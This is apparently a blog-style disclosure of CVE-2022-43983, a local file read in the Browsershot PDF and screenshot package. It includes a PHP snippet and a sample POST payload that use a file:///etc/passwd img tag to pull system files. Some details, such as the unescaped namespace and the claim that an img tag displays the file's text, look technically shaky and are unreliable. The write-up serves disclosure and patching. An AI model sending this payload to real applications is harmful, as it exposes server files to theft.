A new vulnerability has been uncovered in Browsershot 3.57.2, which allows an external attacker to remotely obtain arbitrary local files from the system. The vulnerability has been registered as CVE-2022-43983 and it is caused due to a lack of proper validation for the HTML content passed to the Browsershot::html() method.
In this post, we will discuss the details of this vulnerability, including code snippets showcasing the issue, exploit details, and links to original references.
Vulnerability Details
Browsershot is a popular package for converting web pages into images or PDFs. It does this by allowing a user to pass HTML content to the "Browsershot::html()" method which then converts it into the desired format. However, this method does not properly validate the HTML content to ensure that URLs using the "file://" protocol are not included. Consequently, an attacker can exploit this to read arbitrary local files on the system.
Code Snippet Demonstrating the Issue
// Browsershot vulnerability example
use SpatieBrowsershotBrowsershot;
$content = '<img src="file:///etc/passwd" />'; // Arbitrary local file
$image = Browsershot::html($content)
->noSandbox()
->screenshot()
->timeout(60)
->setOption('args', ['--disable-web-security'])
->inline();
header('Content-Type: image/png');
echo $image;
In the code snippet above, the $content variable contains an HTML code with an image tag. Instead of a standard URL using "http://" or "https://", it utilizes the "file://" protocol to reference a local file: /etc/passwd. When this content is passed to the "Browsershot::html()" method, Browsershot does not validate the URL and proceeds to execute the conversion. This results in the attacker being able to read the contents of /etc/passwd.
Exploit Details
To exploit this vulnerability, the attacker can craft a malicious request to the application that uses Browsershot with the "file://" protocol. The application will then convert the HTML and return the resulting image or PDF, which will contain the contents of the targeted local file.
For example, an attacker could send a POST request to an application vulnerable to this exploit with the following payload:
POST /convert-to-image HTTP/1.1
Host: target-app.com
Content-Type: application/json
Content-Length: 64
{
"html": "<img src=\"file:///etc/passwd\" />"
}
This would result in the application returning an image with the contents of the /etc/passwd file.
Original References
1. Spatie Browsershot GitHub Repository: https://github.com/spatie/browsershot
2. CVE-2022-43983 NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-43983
Conclusion
Vulnerability CVE-2022-43983 in Browsershot 3.57.2 allows an external attacker to remotely obtain arbitrary local files by exploiting the lack of validation for the "file://" protocol in the "Browsershot::html()" method. Developers should update their Browsershot installations to the latest version to address this issue and ensure proper validation of URLs in their applications to mitigate similar vulnerabilities. Regularly reviewing the security of the code, staying up-to-date with vulnerability disclosures, and applying necessary patches can significantly reduce the risk of security breaches in your applications.
Timeline
Published on: 11/25/2022 17:15:00 UTC
Last modified on: 01/10/2023 19:50:00 UTC